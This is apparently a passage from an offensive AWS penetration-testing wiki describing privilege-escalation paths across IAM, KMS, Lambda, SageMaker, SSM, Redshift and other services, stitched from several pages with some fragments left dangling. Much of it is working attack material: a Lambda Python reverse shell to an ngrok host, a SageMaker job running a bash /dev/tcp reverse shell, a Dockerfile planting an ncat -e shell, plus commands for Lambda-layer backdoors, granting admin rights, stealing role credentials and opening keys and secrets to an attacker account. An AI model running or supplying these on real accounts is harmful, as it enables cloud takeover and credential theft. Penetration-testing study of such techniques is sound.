sts:AssumeRole
An attacker with the iam:UpdateAssumeRolePolicy and sts:AssumeRole
permissions can change the assume role policy document of an existing role
to allow himself to assume it.
Where the policy looks like the following, which gives the user permission
to assume the role:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "sts:AssumeRole",
"Principal": {
"AWS": "$USER_ARN"
}
}
]
}
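A minimal sketch, assuming the trust policy above is saved as /tmp/policy.json:
aws iam update-assume-role-policy --role-name <target_role> --policy-document file:///tmp/policy.json
aws sts assume-role --role-arn <target_role_arn> --role-session-name privesc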
iam:UploadSSHPublicKey
An attacker with iam:UploadSSHPublicKey can upload an SSH public
key and associate it with the specified IAM user (Learn more).
The SSH public key uploaded by this operation can be used only for
authenticating the associated IAM user to a CodeCommit repository.
For more information about using SSH keys to authenticate to a
CodeCommit repository, see Set up CodeCommit for SSH connections in
the CodeCommit User Guide.
iam:DeactivateMFADevice
An attacker with iam:DeactivateMFADevice can deactivate the MFA device of
a user.
Potential Impact: Indirect privesc to a user if you already know his username
and password, by disabling his MFA device.
iam:ResyncMFADevice
An attacker with iam:ResyncMFADevice can synchronize the specified
MFA device with an IAM entity: user or role (Learn more).
Potential Impact: Indirect privesc to a user if you already know his username
and password, by adding an MFA device.
iam:UpdateSAMLProvider ,
iam:ListSAMLProviders ,
( iam:GetSAMLProvider )
With these permissions you can change the XML metadata of the SAML
connection. Then, you could abuse the SAML federation to login with any
role that is trusting it.
Note that doing this, legit users won't be able to login. However, you could
get the original XML first, so you can put yours, login and configure the previous
one back.
# List SAMLs
aws iam list-saml-providers
TODO: A Tool capable of generating the SAML metadata and login with a
specified role
iam:UpdateOpenIDConnectProviderThumbprint , iam:ListOpenIDConnectProviders , ( iam:GetOpenIDConnectProvider )
(Unsure about this) If an attacker has these permissions he could add a new
Thumbprint in order to be able to login in all the roles trusting the provider.
# List providers
aws iam list-open-id-connect-providers
# Optional: Get Thumbprints used to not delete them
aws iam get-open-id-connect-provider --open-id-connect-
provider-arn <ARN>
# Update Thumbprints (The thumbprint is always a 40-character
string)
aws iam update-open-id-connect-provider-thumbprint --open-id-
connect-provider-arn <ARN> --thumbprint-list
359755EXAMPLEabc3060bce3EXAMPLEec4542a3
aws-kms-enum.md
kms:ListKeys , kms:PutKeyPolicy ,
( kms:ListKeyPolicies ,
kms:GetKeyPolicy )
With these permissions it's possible to modify the access permissions to
the key so it can be used by other accounts or even anyone:
policy.json:
{
"Version" : "2012-10-17",
"Id" : "key-consolepolicy-3",
"Statement" : [
{
"Sid" : "Enable IAM User Permissions",
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<origin_account>:root"
},
"Action" : "kms:*",
"Resource" : "*"
},
{
"Sid" : "Allow all use",
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : [ "kms:*" ],
"Resource" : "*"
}
]
}
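A sketch of applying that policy (the policy name must be "default"):
aws kms list-keys
aws kms put-key-policy --key-id <key-id> --policy-name default --policy file:///tmp/policy.json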
kms:CreateGrant
It allows a principal to use a KMS key:
aws kms create-grant \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
--grantee-principal
arn:aws:iam::123456789012:user/exampleUser \
--operations Decrypt
Note that it might take a couple of minutes for KMS to allow the user to
use the key after the grant has been generated. Once that time has
passed, the principal can use the KMS key without needing to specify
anything.\ However, if it's needed to use the grant right away, check the
following code.\ For more info read this.
aws-lambda-enum.md
iam:PassRole ,
lambda:CreateFunction ,
lambda:InvokeFunction
A user with the iam:PassRole , lambda:CreateFunction , and
lambda:InvokeFunction permissions can escalate privileges by passing
an existing IAM role to a new Lambda function that includes code to
import the relevant AWS library to their programming language of choice,
then using it to perform actions of their choice. The code could then be run by
invoking the function through the AWS API.
An attacker could abuse this to get a rev shell and steal the token:
rev.py
import socket, subprocess, os, time

def lambda_handler(event, context):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('4.tcp.ngrok.io', 14305))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    p = subprocess.call(['/bin/sh', '-i'])
    time.sleep(900)
    return 0
# List roles
aws iam list-attached-user-policies --user-name <user-name>
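A sketch of packaging and running the function (role ARN and runtime are illustrative; the zip just contains rev.py):
zip rev.zip rev.py
aws lambda create-function \
    --function-name my_function \
    --runtime python3.9 \
    --role <arn-of-role-to-steal> \
    --handler rev.lambda_handler \
    --zip-file fileb://rev.zip
aws lambda invoke --function-name my_function /tmp/out.txt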
You could also abuse the lambda role permissions from the lambda
function itself.\ If the lambda role had enough permissions you could use it
to grant admin rights to you:
import boto3

def lambda_handler(event, context):
    client = boto3.client('iam')
    response = client.attach_user_policy(
        UserName='my_username',
        PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
    )
    return response
iam:PassRole ,
lambda:CreateFunction ,
lambda:AddPermission
Like in the previous scenario, you can grant yourself the
lambda:InvokeFunction permission if you have the permission
lambda:AddPermission
iam:PassRole ,
lambda:CreateFunction ,
lambda:CreateEventSourceMapping
A user with the iam:PassRole , lambda:CreateFunction , and
lambda:CreateEventSourceMapping (and possibly dynamodb:PutItem and
dynamodb:CreateTable ) permissions, but without the
lambda:InvokeFunction permission, can escalate privileges by passing an
existing IAM role to a new Lambda function that includes code to import
the relevant AWS library to their programming language of choice, then
using it to perform actions of their choice. They then would need to either
create a DynamoDB table or use an existing one, to create an event
source mapping for the Lambda function pointing to that DynamoDB
table. Then they would need to either put an item into the table or wait for
another method to do so, so that the Lambda function will be invoked.
Where the code in the python file would utilize the targeted role. An
example would be the same script used in previous method.
After this, the next step depends on whether DynamoDB is being used in
the current AWS environment. If it is being used, all that needs to be done
is creating the event source mapping for the Lambda function, but if not,
then the attacker will need to create a table with streaming enabled with
the following command:
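A sketch of such a table, using the same Test attribute that is inserted later (names are illustrative):
aws dynamodb create-table \
    --table-name my_table \
    --attribute-definitions AttributeName=Test,AttributeType=S \
    --key-schema AttributeName=Test,KeyType=HASH \
    --billing-mode PAY_PER_REQUEST \
    --stream-specification StreamEnabled=true,StreamViewType=NEW_IMAGE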
After this command, the attacker would connect the Lambda function and
the DynamoDB table by creating an event source mapping with the
following command:
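A sketch of the mapping call (the stream ARN comes from the table just created):
aws lambda create-event-source-mapping \
    --function-name my_function \
    --event-source-arn <dynamodb-stream-arn> \
    --starting-position LATEST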
Now that the Lambda function and the stream are connected, the attacker
can invoke the Lambda function by triggering the DynamoDB stream.
This can be done by putting an item into the DynamoDB table, which will
trigger the stream, using the following command:
aws dynamodb put-item --table-name my_table \
--item Test={S="Random string"}
At this point, the Lambda function will be invoked, and the attacker will be
made an administrator of the AWS account.
lambda:AddPermission
An attacker with this permission can grant himself (or others) any
permissions (this generates resource based policies to grant access to the
resource):
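A minimal sketch of granting yourself invocation rights (function name and account id are placeholders):
aws lambda add-permission \
    --function-name <function-name> \
    --statement-id privesc \
    --action lambda:InvokeFunction \
    --principal <your-account-id>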
Where the associated .zip file contains code that utilizes the Lambda’s
role. An example could include the code snippet from previous methods.
lambda:UpdateFunctionConfiguration
Introduction
Lambda Layers allow including code in your lambda function while
storing it separately, so the function code can stay small and several
functions can share code.
Inside a lambda you can check the paths from where python code is loaded
with a function like the following:
import json, sys
def lambda_handler(event, context):
    return json.dumps(sys.path)
1. /var/task
2. /opt/python/lib/python3.7/site-packages
3. /opt/python
4. /var/runtime
5. /var/lang/lib/python37.zip
6. /var/lang/lib/python3.7
7. /var/lang/lib/python3.7/lib-dynload
8. /var/lang/lib/python3.7/site-packages
9. /opt/python/lib/python3.7/site-packages
10. /opt/python
Exploitation
Attaching a layer to a function only requires the
lambda:UpdateFunctionConfiguration permission and layers can be
shared cross-account. We also would need to know what libraries they
are using, so we can override them correctly, but in this example, we’ll just
assume the attacked function is importing boto3.
Just to be safe, we’re going to use Pip to install the same version of the
boto3 library from the Lambda runtime that we are targeting (Python 3.7),
just so there is nothing different that might cause problems in the target
function. That runtime currently uses boto3 version 1.9.42.
With the following code, we’ll install boto3 version 1.9.42 and its
dependencies to a local "lambda_layer" folder:
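A sketch of that step (the python/ subfolder is the layout Lambda expects for Python layers):
mkdir -p lambda_layer/python
pip3 install boto3==1.9.42 -t lambda_layer/python/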
Now, bundle that code into a ZIP file and upload it to a new Lambda
layer in the ATTACKER account. You will need to create a "python"
folder first and put your libraries in there so that once we upload it to
Lambda, the code will be found at "/opt/python/boto3". Also, make sure
that the layer is compatible with Python 3.7 and that the layer is in the
same region as our target function. Once that's done, we'll use
lambda:AddLayerVersionPermission to make the layer publicly
accessible so that our target account can use it. Use your personal AWS
credentials for this API call.
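A sketch of publishing, sharing and attaching the layer (layer name and ARNs are placeholders):
cd lambda_layer && zip -r ../layer.zip python && cd ..
aws lambda publish-layer-version \
    --layer-name boto3-backdoor \
    --zip-file fileb://layer.zip \
    --compatible-runtimes python3.7
aws lambda add-layer-version-permission \
    --layer-name boto3-backdoor --version-number 1 \
    --statement-id xaccount --action lambda:GetLayerVersion --principal '*'
# Then, with the victim credentials, attach the layer to the target function
aws lambda update-function-configuration \
    --function-name <target-function> \
    --layers <layer-version-arn>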
The next step would be to either invoke the function ourselves if we can or
to wait until it gets invoked by normal means–which is the safer method.
?iam:PassRole ,
lambda:CreateFunction ,
lambda:CreateFunctionUrlConfig ,
lambda:InvokeFunctionUrl
Maybe with those permissions you are able to create a function and execute
it calling the URL... but I couldn't find a way to test it, so let me know if you
do!
Lambda MitM
Some lambdas are going to be receiving sensitive info from the users in
parameters. If you get RCE in one of them, you can exfiltrate the info other
users are sending to it, check it in:
aws-warm-lambda-persistence.md
Isolation
Lambda isolation uses these cgroups:
Replacing Runtime
Now with the new bootstrap.py created, it's possible to download it, end
the current lambda invocation and run it to replace the legit one:
import os
from urllib import request
Or you could also use twist_runtime.py, which will end the invocation as
done previously, run the new bootstrap and exfiltrate the information.
If a lambda function is not used for 5-15 minutes it will be shut down, and
all the changes will be lost the next time it's invoked.
Ruby Runtime
In ruby, the file you want to backdoor is /var/runtime/lib/runtime.rb
Then, you just need to do what you did in the python version with just a
change:
require 'net/http'
# Create symlink
ln -s /var/runtime/lib/* /tmp
aws-lightsail-enum.md
It’s important to note that Lightsail doesn’t use IAM roles belonging to
the user but to an AWS managed account, so you can’t abuse this service to
privesc. However, sensitive data such as code, API keys and database info
could be found in this service.
lightsail:DownloadDefaultKeyPair
This permission will allow you to get the SSH keys to access the instances:
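A minimal sketch:
aws lightsail download-default-key-pair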
lightsail:GetInstanceAccessDetails
This permission will allow you to generate SSH keys to access the
instances:
lightsail:CreateBucketAccessKey
This permission will allow you to get a key to access the bucket:
lightsail:GetRelationalDatabaseMasterUserPassword
This permission will allow you to get the credentials to access the database:
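A minimal sketch (database name is a placeholder):
aws lightsail get-relational-database-master-user-password --relational-database-name <db-name>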
aws-mq-enum.md
mq:ListBrokers , mq:CreateUser
With those permissions you can create a new user in an ActiveMQ
broker (this doesn't work in RabbitMQ):
aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --
password <value> --username <value>
mq:ListBrokers , mq:ListUsers ,
mq:UpdateUser
With those permissions you can modify an existing user of an ActiveMQ
broker (this doesn't work in RabbitMQ):
aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --
password <value> --username <value>
mq:ListBrokers , mq:UpdateBroker
If a broker is using LDAP for authorization with ActiveMQ, it's possible to
change the configuration of the LDAP server used to one controlled by
the attacker. This way the attacker will be able to steal all the credentials
being sent through LDAP.
aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-
metadata=...
If you could somehow find the original credentials used by ActiveMQ you
could perform a MitM, steal the creds, use them against the original server, and
forward the response (maybe just reusing the stolen credentials you could do
this).
aws-msk-enum.md
msk:ListClusters ,
msk:UpdateSecurity
With these privileges and access to the VPC where the kafka brokers
are, you could add the None authentication to access them.
You need access to the VPC because you cannot enable None
authentication with Kafka publicly exposed. If it's publicly exposed, if
SASL/SCRAM authentication is used, you could read the secret to access
(you will need additional privileges to read the secret).\ If IAM role-based
authentication is used and kafka is publicly exposed you could still abuse
these privileges to give you permissions to access it.
aws-relational-database-rds-enum.md
rds:ModifyDBInstance
With that permission an attacker can modify the password of the master
user and then login to the database:
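A sketch of the password change (db identifier and password are placeholders):
aws rds modify-db-instance \
    --db-instance-identifier <db-id> \
    --master-user-password 'Newpassword123!' \
    --apply-immediately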
# In case of postgres
psql postgresql://<username>:<pass>@<rds-dns>:5432/<db-name>
You will need to be able to contact to the database (they are usually only
accessible from inside networks).
aws-redshift-enum.md
redshift:DescribeClusters ,
redshift:GetClusterCredentials
With these permissions you can get info of all the clusters (including name
and cluster username) and get credentials to access it:
# Get creds
aws redshift get-cluster-credentials --db-user postgres --
cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the
password
psql -h redshift-cluster-1.asdjuezc439a.us-east-
1.redshift.amazonaws.com -U "IAM:<username>" -d template1 -p
5439
redshift:DescribeClusters , redshift:GetClusterCredentialsWithIAM
With these permissions you can get info of all the clusters and get
credentials to access it.\ Note that the postgres user will have the
permissions that the IAM identity used to get the credentials has.
# Get creds
aws redshift get-cluster-credentials-with-iam --cluster-
identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the
password
psql -h redshift-cluster-1.asdjuezc439a.us-east-
1.redshift.amazonaws.com -U
"IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d
template1 -p 5439
redshift:DescribeClusters ,
redshift:ModifyCluster?
It's possible to modify the master password of the internal postgres
(redshift) user from the aws cli (I think those are the permissions you need but I
haven't tested them yet):
Moreover, as explained here, Redshift also allows to concat roles (as long
as the first one can assume the second one) to get further access but just
separating them with a comma: iam_role
'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:rol
e/RoleB';
Lambdas
As explained in
https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_F
UNCTION.html, it's possible to call a lambda function from redshift with
something like:
S3
As explained in https://docs.aws.amazon.com/redshift/latest/dg/tutorial-
loading-run-copy.html, it's possible to read and write into S3 buckets:
# Read
copy table from 's3://<your-bucket-name>/load/key_prefix'
credentials 'aws_iam_role=arn:aws:iam::<aws-account-
id>:role/<role-name>'
region '<region>'
options;
# Write
unload ('select * from venue')
to 's3://mybucket/tickit/unload/venue_'
iam_role default;
Dynamo
As explained in https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-
data-from-dynamodb.html, it's possible to get data from dynamodb:
copy favoritemovies
from 'dynamodb://ProductCatalog'
iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';
The Amazon DynamoDB table that provides the data must be created in the
same AWS Region as your cluster unless you use the REGION option to
specify the AWS Region in which the Amazon DynamoDB table is located.
EMR
Check https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-
emr.html
And the hijack is possible because there is a small time window from the
moment the template is uploaded to the bucket to the moment the
template is deployed. An attacker might just create a lambda function in
his account that will trigger when a bucket notification is sent, and
hijack the content of that bucket.
The Pacu module cfn__resource_injection can be used to automate this
attack. For more information check the original research:
s3:PutObject , s3:GetObject
These are the permissions to get and upload objects to S3. Several
services inside AWS (and outside of it) use S3 storage to store config files.\
An attacker with read access to them might find sensitive information on
them.\ An attacker with write access to them could modify the data to
abuse some service and try to escalate privileges.\ These are some
examples:
s3:PutBucketPolicy
An attacker, that needs to be from the same account (if not, an error is
triggered), will be able to grant himself more access over the bucket(s) by
modifying the bucket policy.
If successful, you will receive the ARN of the new notebook instance in
the response from AWS. That will take a few minutes to spin up, but once
it has done so, we can run the following command to get a pre-signed URL
to get access to the notebook instance through our web browser. There
are potentially other ways to gain access, but this is a single permission and
single API call, so it seemed simple.
aws sagemaker create-presigned-notebook-instance-url \
--notebook-instance-name <name>
If this instance was fully spun up, this API call will return a signed URL
that we can visit in our browser to access the instance. Once at the Jupyter
page in my browser, I’ll click "Open JupyterLab" in the top right, which can
be seen in the following screenshot.
From the next page, scroll all the way down in the "Launcher" tab. Under
the "Other" section, click the "Terminal" button, which can be seen
here.
From the terminal we have a few options, one of which would be to just use
the AWS CLI. The other option would be to contact the EC2 metadata
service for the IAM role’s credentials directly and exfiltrate them.
sagemaker:CreatePresignedNotebookInstanceUrl
Similar to the previous example, if Jupyter notebooks are already running
on it and you can list them with sagemaker:ListNotebookInstances (or
discover them in any other way), you can generate a URL for them,
access them, and steal the credentials as indicated in the previous
technique.
sagemaker:CreateProcessingJob , iam:PassRole
An attacker with those permissions can make sagemaker execute a
processing job with a sagemaker role attached to it. The attacker can
indicate the definition of the container that will be run in an AWS managed
ECS account instance, and steal the credentials of the IAM role
attached.
# I uploaded a python docker image to the ECR
aws sagemaker create-processing-job \
--processing-job-name privescjob \
--processing-resources '{"ClusterConfig": {"InstanceCount":
1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \
--app-specification "{\"ImageUri\":\"<id>.dkr.ecr.eu-west-
1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-
c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >&
/dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
--role-arn <sagemaker-arn-role>
sagemaker:CreateTrainingJob ,
iam:PassRole
An attacker with those permissions will be able to create a training job,
running an arbitrary container on it with a role attached to it. Therefore,
the attacker will be able to steal the credentials of the role.
This scenario is more difficult to exploit than the previous one because you
need to generate a Docker image that will send the rev shell or creds
directly to the attacker (you cannot indicate a starting command in the
configuration of the training job).
# Create docker image
mkdir /tmp/rev
## Note that the training job is going to call an executable
called "train"
## That's why I'm putting the rev shell in /bin/train
## Set the values of <YOUR-IP-OR-DOMAIN> and <YOUR-PORT>
cat > /tmp/rev/Dockerfile <<EOF
FROM ubuntu
RUN apt update && apt install -y ncat curl
RUN printf '#!/bin/bash\nncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -
e /bin/sh' > /bin/train
RUN chmod +x /bin/train
CMD ncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh
EOF
cd /tmp/rev
sudo docker build . -t reverseshell
# Upload it to ECR
sudo docker login -u AWS -p $(aws ecr get-login-password --
region <region>) <id>.dkr.ecr.<region>.amazonaws.com/<repo>
sudo docker tag reverseshell:latest <account_id>.dkr.ecr.
<region>.amazonaws.com/reverseshell:latest
sudo docker push <account_id>.dkr.ecr.
<region>.amazonaws.com/reverseshell:latest
# Create training job with the docker image created
aws sagemaker create-training-job \
--training-job-name privescjob \
--resource-config '{"InstanceCount": 1,"InstanceType":
"ml.m4.4xlarge","VolumeSizeInGB": 50}' \
--algorithm-specification '{"TrainingImage":"
<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell",
"TrainingInputMode": "Pipe"}' \
--role-arn <role-arn> \
--output-data-config '{"S3OutputPath": "s3://<bucket>"}' \
--stopping-condition '{"MaxRuntimeInSeconds": 600}'
sagemaker:CreateHyperParameterTuningJob , iam:PassRole
An attacker with those permissions will (potentially) be able to create a
hyperparameter tuning job, running an arbitrary container on it with
a role attached to it.\ I haven't exploited it because of lack of time, but it
looks similar to the previous exploits, feel free to send a PR with the
exploitation details.
aws-secrets-manager-enum.md
secretsmanager:GetSecretValue
An attacker with this permission can get the saved value inside a secret in
AWS Secretsmanager.
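A minimal sketch (secret name is a placeholder):
aws secretsmanager get-secret-value --secret-id <secret_name>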
Potential Impact: Access high sensitive data inside AWS secrets manager
service.
secretsmanager:GetResourcePolicy ,
secretsmanager:PutResourcePolicy ,
( secretsmanager:ListSecrets )
With the previous permissions it's possible to give access to other
principals/accounts (even external) to access the secret. Note that in order
to read secrets encrypted with a KMS key, the user also needs to have
access over the KMS key (more info in the KMS Enum page).
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id
<secret_name>
aws secretsmanager put-resource-policy --secret-id
<secret_name> --resource-policy file:///tmp/policy.json
policy.json:
{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}
aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum
ssm:SendCommand
An attacker with the permission ssm:SendCommand can execute
commands in instances running the Amazon SSM Agent and compromise
the IAM Role running inside of it.
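A sketch of running a command and reading its output (instance and command ids are placeholders):
aws ssm send-command \
    --instance-ids <instance-id> \
    --document-name "AWS-RunShellScript" \
    --parameters 'commands=["curl http://169.254.169.254/latest/meta-data/iam/security-credentials/"]'
aws ssm get-command-invocation --command-id <command-id> --instance-id <instance-id>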
ssm:StartSession
An attacker with the permission ssm:StartSession can start a SSH like
session in instances running the Amazon SSM Agent and compromise the
IAM Role running inside of it.
Potential Impact: Direct privesc to the EC2 IAM roles attached to running
instances with SSM Agents running.
Privesc to ECS
When ECS tasks run with ExecuteCommand enabled users with enough
permissions can use ecs execute-command to execute a command inside
the container.\ According to the documentation this is done by creating a
secure channel between the device you use to initiate the “exec“ command
and the target container with SSM Session Manager. Therefore, users with
ssm:StartSession will be able to get a shell inside ECS tasks with that
option enabled just running:
aws ssm start-session --target
"ecs:CLUSTERNAME_TASKID_RUNTIMEID"
Potential Impact: Direct privesc to the ECS IAM roles attached to running
tasks with ExecuteCommand enabled.
ssm:ResumeSession
An attacker with the permission ssm:ResumeSession can re-start a SSH
like session in instances running the Amazon SSM Agent with a
disconnected SSM session state and compromise the IAM Role running
inside of it.
Potential Impact: Direct privesc to the EC2 IAM roles attached to running
instances with SSM Agents running and disconnected sessions.
ssm:DescribeParameters ,
( ssm:GetParameter |
ssm:GetParameters )
An attacker with the mentioned permissions is going to be able to list the
SSM parameters and read them in clear-text. In these parameters you can
frequently find sensitive information such as SSH keys or API keys.
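A minimal sketch (parameter name is a placeholder):
aws ssm describe-parameters
aws ssm get-parameter --name <parameter-name> --with-decryption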
ssm:ListCommands
An attacker with this permission can list all the commands sent and
hopefully find sensitive information on them.
ssm:GetCommandInvocation ,
( ssm:ListCommandInvocations |
ssm:ListCommands )
An attacker with these permissions can list all the commands sent and read
the output generated hopefully finding sensitive information on it.
# You can use any of both options to get the command-id and
instance id
aws ssm list-commands
aws ssm list-command-invocations
For example, the following role trust policy indicates that anyone can
assume it, therefore any user will be able to privesc to the permissions
associated with that role.
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "sts:AssumeRole"
}
]
}
sts:AssumeRoleWithSAML
A trust policy with this action grants users authenticated via SAML access
to impersonate the role.
But providers might have their own tools to make this easier, like
onelogin-aws-assume-role:
onelogin-aws-assume-role --onelogin-subdomain mettle --
onelogin-app-id 283740 --aws-region eu-west-1 -z 3600
sts:AssumeRoleWithWebIdentity
This permission allows obtaining a set of temporary security
credentials for users who have been authenticated in a mobile or web
application, EKS... with a web identity provider. Learn more here.
Federation Abuse
aws-federation-abuse.md
AWS - WorkDocs Privesc
WorkDocs
For more info about WorkDocs check:
aws-directory-services-workdocs.md
workdocs:CreateUser
Create a user inside the Directory indicated, then you will have access to
both WorkDocs and AD:
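A sketch of the call (directory id and user details are placeholders):
aws workdocs create-user \
    --organization-id <directory-id> \
    --username attacker \
    --given-name attacker --surname attacker \
    --password 'Newpassword123!' \
    --email-address attacker@example.com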
workdocs:GetDocument , ( workdocs:DescribeActivities )
The files might contain sensitive information, read them:
# Get what was created in the directory
aws workdocs describe-activities --organization-id <directory-
id>
workdocs:AddResourcePermissions
If you don't have access to read something, you can just grant it to yourself:
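A sketch of granting yourself owner rights over a resource (ids are placeholders):
aws workdocs add-resource-permissions \
    --resource-id <resource-id> \
    --principals Id=<your-user-id>,Type=USER,Role=OWNER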
workdocs:AddUserToGroup
You can make a user admin by setting it in the group ZOCALO_ADMIN.\
For that follow the instructions from
https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_adm
in.html
Login with that user in workdoc and access the admin panel in
/workdocs/index.html#/admin
I didn't find any way to do this from the cli.
AWS - Misc Privesc
Misc
Here you will find combinations of permissions you could abuse to
escalate privileges or access sensitive data.
route53:CreateHostedZone , route53:ChangeResourceRecordSets , acm-pca:IssueCertificate , acm-pca:GetCertificate
To perform this attack the target account must already have an AWS
Certificate Manager Private Certificate Authority (AWS-PCA) setup in
the account, and EC2 instances in the VPC(s) must have already imported
the certificates to trust it. With this infrastructure in place, the following
attack can be performed to intercept AWS API traffic.
pca:ListCertificateAuthorities , ec2:DescribeVpcs
route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-
issuecertificate-acm-pca-getcer.md
ec2:DescribeInstances ,
ec2:RunInstances ,
ec2:CreateSecurityGroup ,
ec2:AuthorizeSecurityGroupIngress ,
ec2:CreateTrafficMirrorTarget ,
ec2:CreateTrafficMirrorSession ,
ec2:CreateTrafficMirrorFilter ,
ec2:CreateTrafficMirrorFilterRule
With all these permissions you will be able to run a "malmirror" that will
be able to steal the network packets sent inside the VPC.
Let’s start with the prerequisites that the attacker has taken over the IAM
role which allows to make modifications to Route53 and issue the
certificates signed by private CA from ACM-PCA.
The minimum IAM permissions that the role must have to do the same
exploitation are:
route53:CreateHostedZone
route53:ChangeResourceRecordSets
acm-pca:IssueCertificate
acm-pca:GetCertificate
The other IAM permissions which can be useful in enumeration but are not
mandatory to exploit:
route53:GetHostedZone
route53:ListHostedZones
acm-pca:ListCertificateAuthorities
ec2:DescribeVpcs
Once the attacker has minimum IAM permissions on route53 and acm-pca,
he or she would be able to hijack the calls to the AWS API and successfully
escalate the IAM privileges in the AWS deployment - by forwarding the hijacked
AWS API calls to the relevant VPC Endpoints and reading the responses, e.g. a
secretsmanager:GetSecretValue call.
All of those assumptions are not true. The AWS Security has been
consulted but it turned out it is not a security bug. There are use cases
where the clients want to set up the proxy or custom routing for the traffic
to AWS APIs. I have decided to document and share this behavior as it
might be useful for other cloud pen-testers.
Discovery
The discovery started with playing the route53, by first creating the hosted
zone for amazonaws.com, which failed:
I have tried the same for us-east-1.amazonaws.com, which gave the same
results:
Simulating the victim listing secrets in the victim machine and in the
attacker’s machine we receive the connection which is TLS encrypted
traffic:
The communication is TLS encrypted but if the applications in the VPC
trust the private CA managed by the ACM-PCA and the attacker has IAM
permissions to control that private CA in ACM-PCA, it would be possible
to do full Man-In-The-Middle and escalate IAM privileges.
Exploitation
You can watch the whole exploitation here:
https://youtu.be/I-IakgPyEtk
If you prefer to read and go through the screenshot, please carry on.
In the real world, the ec2 should not have such broad permissions but you
may encounter some developer or DevOps role having so.
The compromised ec2 with the privileged IAM role has the internal IP
10.0.0.87, the victim application runs on the ec2 with IP 10.0.0.224.
Now on the attacker’s owned machine, we create the hosted zone for
secretsmanager.us-east-1.amazonaws.com:
Then set the A record for secretsmanager.us-east-1.amazonaws.com
pointing to the 10.0.0.87:
Then, the attacker retrieves the signed certificate from the ACM-PCA:
To simulate the Java Application calls to Secrets Manager from the victim’s
machine, I have run the JUnit tests through maven, in the below screenshot
you can see that there are no exceptions, which means that the certificate is
trusted:
Finally, in the ncat listener, we can see the HTTP request sent by the AWS
SDK from Java Application.
How to escalate the IAM privileges using that? We do not have the
permissions to do s3:GetObject on any s3 object or to do
secretsmanager:GetSecretValue, but if we sniff the traffic to either S3 or
secretsmanager with those calls, we can forward the requests to the
respective VPCE and obtain access to Objects stored in S3 or secrets stored
in secretsmanager.
Conclusions
It is recommended to avoid broad route53 IAM permissions with regards to
the creation of a private hosted zone or unrestricted
route53:ChangeResourceRecordSets. Since ACM-PCA does not allow to
apply restrictions on which domain’s certificate can be signed by the private
CA, it is also recommended to pay special attention to the acm-
pca:IssueCertificate IAM permissions.
Abstract Services
These services are removed, abstracted, from the platform or
management layer which cloud applications are built on.
The services are accessed via endpoints using AWS application
programming interfaces, APIs.
The underlying infrastructure, operating system, and platform is
managed by AWS.
The abstracted services provide a multi-tenancy platform on which the
underlying infrastructure is shared.
Data is isolated via security mechanisms.
Abstract services have a strong integration with IAM, and examples of
abstract services include S3, DynamoDB, Amazon Glacier, and SQS.
Services Enumeration
AWS offers hundreds of different services, here you can find how to
enumerate some of them, and also post-exploitation, persistence and
detection evasion tricks:
CloudTrail
CloudWatch
Cost Explorer
Config
Detective
Firewall Manager
GuardDuty
Inspector
Macie
Security Hub
Shield
Trusted Advisor
WAF
S3 folder structure
Note that the folder names "AWSLogs" and "CloudTrail" are fixed. This way you can easily configure CloudTrail in all the regions of all the accounts and centralize the logs in one account (which you should protect).
Logs to CloudWatch
CloudTrail can automatically send logs to CloudWatch so you can set alerts that warn you when suspicious activities are performed. Note that in order to allow CloudTrail to send the logs to CloudWatch, a role needs to be created that allows that action. If possible, it's recommended to use the AWS default role to perform these actions. This role will allow CloudTrail to create a log stream in the log group and publish the log events to it (logs:CreateLogStream and logs:PutLogEvents).
Event History
CloudTrail Event History allows you to inspect in a table the logs that have
been recorded:
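The same information can also be queried from the CLI, for example (the attribute filter is just an example):
# Look up the last events recorded in Event History
aws cloudtrail lookup-events --max-results 10
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin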
Insights
CloudTrail Insights automatically analyzes write management events
from CloudTrail trails and alerts you to unusual activity. For example, if
there is an increase in TerminateInstance events that differs from
established baselines, you’ll see it as an Insight event. These events make
finding and responding to unusual API activity easier than ever.
Security
CloudTrail Log File Integrity:
Validates whether logs have been tampered with (modified or deleted)
Uses digest files (a hash is created for each log file)
SHA-256 hashing, and SHA-256 with RSA for digital signing
The private key is owned by Amazon
It takes 1 hour to create a digest file (done on the hour, every hour)
# Get insights
aws cloudtrail get-insight-selectors --trail-name <trail_name>
CSV Injection
It's possible to perform a CSV injection inside CloudTrail that will execute arbitrary code if the logs are exported in CSV and opened with Excel. The following code will generate a log entry with a bad trail name containing the payload:
import boto3

